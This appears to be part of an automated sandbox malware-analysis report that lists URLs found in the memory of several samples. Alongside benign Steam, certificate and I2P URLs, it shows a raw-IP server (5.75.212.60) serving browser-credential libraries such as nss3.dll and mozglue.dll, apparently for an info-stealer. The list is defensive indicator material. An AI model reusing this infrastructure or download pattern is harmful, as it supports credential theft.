Source: file.exe, 00000000.00000002.2783489358.00000000417CC000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2502822954.000000001B566000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.2771309518.0000000023AAE000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2502799257.000000001B564000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.2778975346.00000000358FF000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.2773812386.0000000029A18000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2395414511.000000001B56D000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://ocsp.digicert.com0N
Source: file.exe, 00000000.00000002.2783489358.00000000417CC000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2502822954.000000001B566000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2395376073.000000001B579000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.2771309518.0000000023AAE000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2502799257.000000001B564000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.2778975346.00000000358FF000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.2773812386.0000000029A18000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://ocsp.digicert.com0X
Source: main.exe, 00000017.00000002.3440296730.000001E398B72000.00000004.00000020.00020000.00000000.sdmp, main.exe, 00000017.00000002.3441085501.000001E398F9D000.00000004.00000020.00020000.00000000.sdmp, i2p.conf.23.dr, KXEmxT2p.23.dr String found in binary or memory: http://reg.i2p/hosts.txt
Source: main.exe, 00000017.00000002.3441085501.000001E398F9D000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://reg.i2p/hosts.txt7t
Source: main.exe, 00000017.00000002.3441085501.000001E398F9D000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://reg.i2p/hosts.txtcc
Source: main.exe, 00000017.00000002.3441085501.000001E399027000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://reg.i2p/hosts.txtvp/p_lib.c
Source: BFCAAEHJDB.exe, 00000007.00000003.2859028722.00000000044A4000.00000004.00000020.00020000.00000000.sdmp, BFCAAEHJDB.exe, 00000007.00000003.2850857977.00000000044A2000.00000004.00000020.00020000.00000000.sdmp, euasv89vr56qz5toefmgc1.exe, 0000000E.00000000.2871865920.00007FF67096E000.00000008.00000001.01000000.0000000C.sdmp, main.exe, 00000017.00000002.3440296730.000001E398B72000.00000004.00000020.00020000.00000000.sdmp, i2p.conf.23.dr String found in binary or memory: http://rus.i2p/hosts.txt
Source: main.exe, 00000017.00000002.3441085501.000001E398F9D000.00000004.00000020.00020000.00000000.sdmp, i2p.conf.23.dr, KXEmxT2p.23.dr String found in binary or memory: http://shx5vqsw7usdaunyzr2qmes2fq37oumybpudrd4jjj4e4vk4uusa.b32.i2p/hosts.txt
Source: main.exe, 00000017.00000002.3441085501.000001E398F9D000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://shx5vqsw7usdaunyzr2qmes2fq37oumybpudrd4jjj4e4vk4uusa.b32.i2p/hosts.txtxyz/
Source: BFCAAEHJDB.exe, 00000007.00000003.2859028722.00000000044A4000.00000004.00000020.00020000.00000000.sdmp, BFCAAEHJDB.exe, 00000007.00000003.2850857977.00000000044A2000.00000004.00000020.00020000.00000000.sdmp, euasv89vr56qz5toefmgc1.exe, 0000000E.00000000.2871865920.00007FF67096E000.00000008.00000001.01000000.0000000C.sdmp, main.exe, 00000017.00000002.3440296730.000001E398B72000.00000004.00000020.00020000.00000000.sdmp, i2p.conf.23.dr String found in binary or memory: http://stats.i2p/cgi-bin/newhosts.txt
Source: file.exe, 00000000.00000002.2762253914.000000000251A000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2269076483.0000000002529000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.2761033099.0000000000438000.00000040.00000001.01000000.00000003.sdmp String found in binary or memory: http://store.steampowered.com/account/cookiepreferences/
Source: file.exe, 00000000.00000002.2761033099.0000000000438000.00000040.00000001.01000000.00000003.sdmp String found in binary or memory: http://store.steampowered.com/privacy_agreement/
Source: file.exe, 00000000.00000002.2762253914.000000000251A000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2269076483.0000000002529000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.2761033099.0000000000438000.00000040.00000001.01000000.00000003.sdmp String found in binary or memory: http://store.steampowered.com/subscriber_agreement/
Source: Amcache.hve.13.dr String found in binary or memory: http://upx.sf.net
Source: file.exe, 00000000.00000002.2783489358.00000000417CC000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2502822954.000000001B566000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.2771309518.0000000023AAE000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2502799257.000000001B564000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.2778975346.00000000358FF000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.2773812386.0000000029A18000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2395414511.000000001B56D000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://www.digicert.com/CPS0
Source: file.exe, file.exe, 00000000.00000002.2788158189.000000006C85D000.00000002.00000001.01000000.00000008.sdmp, file.exe, 00000000.00000002.2773812386.0000000029A18000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://www.mozilla.com/en-US/blocklist/
Source: file.exe, 00000000.00000002.2768266325.000000001B807000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.2767527727.00000000191FD000.00000002.00001000.00020000.00000000.sdmp String found in binary or memory: http://www.sqlite.org/copyright.html.
Source: file.exe, 00000000.00000003.2228501229.0000000002522000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.2762253914.000000000251A000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2269076483.0000000002529000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.2761033099.0000000000438000.00000040.00000001.01000000.00000003.sdmp String found in binary or memory: http://www.valvesoftware.com/legal.htm
Source: file.exe, 00000000.00000002.2761033099.0000000000438000.00000040.00000001.01000000.00000003.sdmp, file.exe, 00000000.00000002.2761033099.0000000000607000.00000040.00000001.01000000.00000003.sdmp String found in binary or memory: https://5.75.212.60
Source: file.exe, 00000000.00000003.2269115043.00000000024FE000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2502799257.000000001B564000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2361797117.000000001B53B000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2395488232.000000001B541000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2395414511.000000001B564000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.2762253914.000000000251A000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2373150785.000000001B560000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2269076483.0000000002529000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2373328753.000000001B536000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2373854371.000000001B562000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2374176714.000000001B564000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://5.75.212.60/
Source: file.exe, 00000000.00000003.2373328753.000000001B536000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://5.75.212.60/#
Source: file.exe, 00000000.00000003.2395488232.000000001B541000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2373328753.000000001B536000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://5.75.212.60//
Source: file.exe, 00000000.00000003.2269115043.00000000024FE000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://5.75.212.60//S
Source: file.exe, 00000000.00000003.2269076483.0000000002529000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://5.75.212.60/0
Source: file.exe, 00000000.00000003.2269076483.0000000002529000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://5.75.212.60/2
Source: file.exe, 00000000.00000003.2269076483.0000000002529000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://5.75.212.60/4
Source: file.exe, 00000000.00000003.2502799257.000000001B564000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://5.75.212.60/5
Source: file.exe, 00000000.00000003.2502799257.000000001B564000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://5.75.212.60/5.212.60/
Source: file.exe, 00000000.00000003.2502799257.000000001B564000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://5.75.212.60/5.212.60/nss3.dll
Source: file.exe, 00000000.00000003.2361797117.000000001B53B000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://5.75.212.60/6
Source: file.exe, 00000000.00000003.2269076483.0000000002529000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://5.75.212.60/;
Source: file.exe, 00000000.00000002.2762253914.000000000251A000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2269076483.0000000002529000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://5.75.212.60/A
Source: file.exe, 00000000.00000003.2269115043.00000000024FE000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2502799257.000000001B564000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://5.75.212.60/B_F
Source: file.exe, 00000000.00000003.2373150785.000000001B560000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2373854371.000000001B562000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://5.75.212.60/EGIDHDHIDG
Source: file.exe, 00000000.00000003.2269076483.0000000002529000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://5.75.212.60/H
Source: file.exe, 00000000.00000003.2502799257.000000001B564000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2395414511.000000001B564000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2373150785.000000001B560000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2373854371.000000001B562000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2374176714.000000001B564000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://5.75.212.60/ata
Source: file.exe, 00000000.00000003.2269076483.0000000002529000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://5.75.212.60/e
Source: file.exe, 00000000.00000003.2395488232.000000001B541000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.2768054750.000000001B536000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://5.75.212.60/freebl3.dll
Source: file.exe, 00000000.00000003.2395488232.000000001B541000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://5.75.212.60/freebl3.dllE
Source: file.exe, 00000000.00000003.2395488232.000000001B541000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.2768054750.000000001B536000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://5.75.212.60/freebl3.dllh
Source: file.exe, 00000000.00000003.2395488232.000000001B541000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://5.75.212.60/freebl3.dlls
Source: file.exe, 00000000.00000003.2269115043.00000000024FE000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://5.75.212.60/licies
Source: file.exe, 00000000.00000002.2768054750.000000001B536000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://5.75.212.60/mozglue.dll
Source: file.exe, 00000000.00000002.2768054750.000000001B536000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://5.75.212.60/mozglue.dlls
Source: file.exe, 00000000.00000002.2762253914.000000000251A000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://5.75.212.60/msvcp140.dll
Source: file.exe, 00000000.00000002.2768054750.000000001B536000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://5.75.212.60/nss3.dll
Source: file.exe, 00000000.00000002.2768054750.000000001B536000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://5.75.212.60/nss3.dlle
Source: file.exe, 00000000.00000003.2269115043.00000000024FE000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://5.75.212.60/ows
Source: file.exe, 00000000.00000002.2762253914.000000000251A000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://5.75.212.60/softokn3.dll
Source: file.exe, 00000000.00000002.2762253914.000000000251A000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://5.75.212.60/softokn3.dllnXq
Source: file.exe, 00000000.00000002.2761033099.000000000052A000.00000040.00000001.01000000.00000003.sdmp, file.exe, 00000000.00000002.2762253914.00000000024F3000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://5.75.212.60/sqls.dll
Source: file.exe, 00000000.00000002.2768054750.000000001B4F0000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://5.75.212.60/vcruntime140.dll
Source: file.exe, 00000000.00000002.2762253914.000000000251A000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://5.75.212.60/vcruntime140.dll;
Source: file.exe, 00000000.00000002.2761033099.0000000000607000.00000040.00000001.01000000.00000003.sdmp String found in binary or memory: https://5.75.212.60art/form-data;
Source: file.exe, 00000000.00000003.2362409222.000000001B585000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://ac.ecosia.org/autocomplete?q=
Source: file.exe, 00000000.00000003.2228501229.000000000252E000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://api.steampowered.com/
Source: file.exe, 00000000.00000002.2761033099.0000000000438000.00000040.00000001.01000000.00000003.sdmp String found in binary or memory: https://avatars.akamai.steamstatic.com/fef49e7fa7e1997310d705b2a6158ff8dc1cdfeb_full.jpg
Source: BFCAAEHJDB.exe, 00000007.00000003.2859028722.000000000437F000.00000004.00000020.00020000.00000000.sdmp, BFCAAEHJDB.exe, 00000007.00000003.2850857977.000000000437D000.00000004.00000020.00020000.00000000.sdmp, euasv89vr56qz5toefmgc1.exe, 0000000E.00000000.2871865920.00007FF67096E000.00000008.00000001.01000000.0000000C.sdmp, main.exe, main.exe, 00000017.00000002.3442752199.00007FFD940A4000.00000002.00000001.01000000.00000011.sdmp, main.exe, 00000017.00000002.3440296730.000001E398B72000.00000004.00000020.00020000.00000000.sdmp, main.exe, 00000017.00000002.3441085501.000001E398F9D000.00000004.00000020.00020000.00000000.sdmp, KXEmxT2p.23.dr String found in binary or memory: https://banana.incognet.io/
Source: file.exe, 00000000.00000002.2767835795.0000000019760000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.2768175135.000000001B55F000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2722820114.000000001B55F000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://bridge.sfo1.admarketplace.net/ctp?version=16.0.0&key=1696484494400800000.2&ci=1696484494189.
Source: file.exe, 00000000.00000002.2767835795.0000000019760000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.2768175135.000000001B55F000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2722820114.000000001B55F000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://bridge.sfo1.ap01.net/ctp?version=16.0.0&key=1696484494400800000.1&ci=1696484494189.12791&cta
Source: file.exe, 00000000.00000003.2228501229.000000000252E000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://broadcast.st.dl.eccdnx.com
Source: file.exe, 00000000.00000003.2228501229.000000000252E000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://cdn.akamai.steamstatic.com/steamcommunity/public/assets/
Source: file.exe, 00000000.00000003.2362409222.000000001B585000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=
Source: file.exe, 00000000.00000003.2362409222.000000001B585000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search
Source: file.exe, 00000000.00000003.2362409222.000000001B585000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=
Source: file.exe, 00000000.00000003.2228501229.000000000252E000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://checkout.steampowered.com/
Source: file.exe, 00000000.00000003.2228501229.000000000252E000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://community.akamai.steamstatic.com/
Source: file.exe, 00000000.00000002.2761033099.0000000000438000.00000040.00000001.01000000.00000003.sdmp String found in binary or memory: https://community.akamai.steamstatic.com/public/css/applications/community/main.css?v=eZOyL2UG5OX8&a
Source: file.exe, 00000000.00000002.2762253914.000000000251A000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2269076483.0000000002529000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.2761033099.0000000000438000.00000040.00000001.01000000.00000003.sdmp String found in binary or memory: https://community.akamai.steamstatic.com/public/css/globalv2.css?v=PAcV2zMBzzSV&l=english
Source: file.exe, 00000000.00000002.2762253914.000000000251A000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2269076483.0000000002529000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.2761033099.0000000000438000.00000040.00000001.01000000.00000003.sdmp String found in binary or memory: https://community.akamai.steamstatic.com/public/css/promo/summer2017/stickers.css?v=HA2Yr5oy3FFG&amp
Source: file.exe, 00000000.00000002.2762253914.000000000251A000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2269076483.0000000002529000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.2761033099.0000000000438000.00000040.00000001.01000000.00000003.sdmp String found in binary or memory: https://community.akamai.steamstatic.com/public/css/skin_1/header.css?v=NFoCa4OkAxRb&l=english
Source: file.exe, 00000000.00000002.2761033099.0000000000438000.00000040.00000001.01000000.00000003.sdmp String found in binary or memory: https://community.akamai.steamstatic.com/public/css/skin_1/modalContent.css?v=.TP5s6TzX6LLh
Source: file.exe, 00000000.00000002.2762253914.000000000251A000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2269076483.0000000002529000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.2761033099.0000000000438000.00000040.00000001.01000000.00000003.sdmp String found in binary or memory: https://community.akamai.steamstatic.com/public/css/skin_1/profilev2.css?v=M_qL4gO2sKII&l=englis
Source: file.exe, 00000000.00000003.2228501229.0000000002522000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.2762253914.000000000251A000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2269076483.0000000002529000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.2761033099.0000000000438000.00000040.00000001.01000000.00000003.sdmp String found in binary or memory: https://community.akamai.steamstatic.com/public/images/skin_1/arrowDn9x5.gif
Source: file.exe, 00000000.00000002.2762253914.000000000251A000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2269076483.0000000002529000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.2761033099.0000000000438000.00000040.00000001.01000000.00000003.sdmp String found in binary or memory: https://community.akamai.steamstatic.com/public/images/skin_1/footerLogo_valve.png?v=1
Source: file.exe, 00000000.00000002.2762253914.000000000251A000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2269115043.000000000251A000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2269076483.0000000002529000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.2761033099.0000000000438000.00000040.00000001.01000000.00000003.sdmp String found in binary or memory: https://community.akamai.steamstatic.com/public/javascript/applications/community/libraries~b28b7af6
Source: file.exe, 00000000.00000002.2762253914.000000000251A000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2269115043.000000000251A000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2269076483.0000000002529000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.2761033099.0000000000438000.00000040.00000001.01000000.00000003.sdmp String found in binary or memory: https://community.akamai.steamstatic.com/public/javascript/applications/community/main.js?v=3eYWCMu_
Source: file.exe, 00000000.00000002.2762253914.000000000251A000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2269115043.000000000251A000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2269076483.0000000002529000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.2761033099.0000000000438000.00000040.00000001.01000000.00000003.sdmp String found in binary or memory: https://community.akamai.steamstatic.com/public/javascript/applications/community/manifest.js?v=e0OV
Source: file.exe, 00000000.00000002.2762253914.000000000251A000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2269076483.0000000002529000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.2761033099.0000000000438000.00000040.00000001.01000000.00000003.sdmp String found in binary or memory: https://community.akamai.steamstatic.com/public/javascript/global.js?v=B7Vsdo1okyaC&l=english
Source: file.exe, 00000000.00000002.2762253914.000000000251A000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2269076483.0000000002529000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.2761033099.0000000000438000.00000040.00000001.01000000.00000003.sdmp String found in binary or memory: https://community.akamai.steamstatic.com/public/javascript/jquery-1.11.1.min.js?v=.isFTSRckeNhC
Source: file.exe, 00000000.00000002.2762253914.000000000251A000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2269076483.0000000002529000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.2761033099.0000000000438000.00000040.00000001.01000000.00000003.sdmp String found in binary or memory: https://community.akamai.steamstatic.com/public/javascript/modalContent.js?v=f2hMA1v9Zkc8&l=engl
Source: file.exe, 00000000.00000002.2762253914.000000000251A000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2269076483.0000000002529000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.2761033099.0000000000438000.00000040.00000001.01000000.00000003.sdmp String found in binary or memory: https://community.akamai.steamstatic.com/public/javascript/modalv2.js?v=dfMhuy-Lrpyo&l=english
Source: file.exe, 00000000.00000002.2761033099.0000000000438000.00000040.00000001.01000000.00000003.sdmp String found in binary or memory: https://community.akamai.steamstatic.com/public/javascript/profile.js?v=Iy1ies1ROjUT&l=english
Source: file.exe, 00000000.00000002.2762253914.000000000251A000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2269076483.0000000002529000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.2761033099.0000000000438000.00000040.00000001.01000000.00000003.sdmp String found in binary or memory: https://community.akamai.steamstatic.com/public/javascript/promo/stickers.js?v=upl9NJ5D2xkP&l=en
Source: file.exe, 00000000.00000002.2762253914.000000000251A000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2269076483.0000000002529000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.2761033099.0000000000438000.00000040.00000001.01000000.00000003.sdmp String found in binary or memory: https://community.akamai.steamstatic.com/public/javascript/prototype-1.7.js?v=.55t44gwuwgvw
Source: file.exe, 00000000.00000002.2762253914.000000000251A000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2269076483.0000000002529000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.2761033099.0000000000438000.00000040.00000001.01000000.00000003.sdmp String found in binary or memory: https://community.akamai.steamstatic.com/public/javascript/reportedcontent.js?v=dAtjbcZMWhSe&l=e
Source: file.exe, 00000000.00000002.2762253914.000000000251A000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2269076483.0000000002529000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.2761033099.0000000000438000.00000040.00000001.01000000.00000003.sdmp String found in binary or memory: https://community.akamai.steamstatic.com/public/javascript/scriptaculous/_combined.js?v=OeNIgrpEF8tL
Source: file.exe, 00000000.00000002.2762253914.000000000251A000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2269076483.0000000002529000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.2761033099.0000000000438000.00000040.00000001.01000000.00000003.sdmp String found in binary or memory: https://community.akamai.steamstatic.com/public/javascript/webui/clientcom.js?v=54OKIvHlOQzF&l=e
Source: file.exe, 00000000.00000002.2762253914.000000000251A000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2269076483.0000000002529000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.2761033099.0000000000438000.00000040.00000001.01000000.00000003.sdmp String found in binary or memory: https://community.akamai.steamstatic.com/public/shared/css/buttons.css?v=PUJIfhtcQn7W&l=english
Source: file.exe, 00000000.00000002.2761033099.0000000000438000.00000040.00000001.01000000.00000003.sdmp String found in binary or memory: https://community.akamai.steamstatic.com/public/shared/css/motiva_sans.css?v=-DH0xTYpnVe2&l=engl
Source: file.exe, 00000000.00000002.2762253914.000000000251A000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2269076483.0000000002529000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.2761033099.0000000000438000.00000040.00000001.01000000.00000003.sdmp String found in binary or memory: https://community.akamai.steamstatic.com/public/shared/css/shared_global.css?v=_D2Bg4UEaFxK&l=en
Source: file.exe, 00000000.00000002.2762253914.000000000251A000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2269076483.0000000002529000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.2761033099.0000000000438000.00000040.00000001.01000000.00000003.sdmp String found in binary or memory: https://community.akamai.steamstatic.com/public/shared/css/shared_responsive.css?v=sHIIcMzCffX6&
Source: file.exe, 00000000.00000003.2228501229.0000000002522000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.2762253914.000000000251A000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2269076483.0000000002529000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.2761033099.0000000000438000.00000040.00000001.01000000.00000003.sdmp String found in binary or memory: https://community.akamai.steamstatic.com/public/shared/images/header/logo_steam.svg?t=962016
Source: file.exe, 00000000.00000003.2228501229.0000000002522000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.2762253914.000000000251A000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2269076483.0000000002529000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.2761033099.0000000000438000.00000040.00000001.01000000.00000003.sdmp String found in binary or memory: https://community.akamai.steamstatic.com/public/shared/images/responsive/header_logo.png
Source: file.exe, 00000000.00000003.2228501229.0000000002522000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.2762253914.000000000251A000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2269076483.0000000002529000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.2761033099.0000000000438000.00000040.00000001.01000000.00000003.sdmp String found in binary or memory: https://community.akamai.steamstatic.com/public/shared/images/responsive/header_menu_hamburger.png
Source: file.exe, 00000000.00000003.2228501229.0000000002522000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.2762253914.000000000251A000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2269076483.0000000002529000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.2761033099.0000000000438000.00000040.00000001.01000000.00000003.sdmp String found in binary or memory: https://community.akamai.steamstatic.com/public/shared/images/responsive/logo_valve_footer.png
Source: file.exe, 00000000.00000002.2761033099.0000000000438000.00000040.00000001.01000000.00000003.sdmp String found in binary or memory: https://community.akamai.steamstatic.com/public/shared/javascript/shared_global.js?v=REEGJU1hwkYl&am
Source: file.exe, 00000000.00000002.2762253914.000000000251A000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2269076483.0000000002529000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.2761033099.0000000000438000.00000040.00000001.01000000.00000003.sdmp String found in binary or memory: https://community.akamai.steamstatic.com/public/shared/javascript/shared_responsive_adapter.js?v=pSv
Source: file.exe, 00000000.00000002.2762253914.000000000251A000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2269076483.0000000002529000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.2761033099.0000000000438000.00000040.00000001.01000000.00000003.sdmp String found in binary or memory: https://community.akamai.steamstatic.com/public/shared/javascript/tooltip.js?v=.zYHOpI1L3Rt0
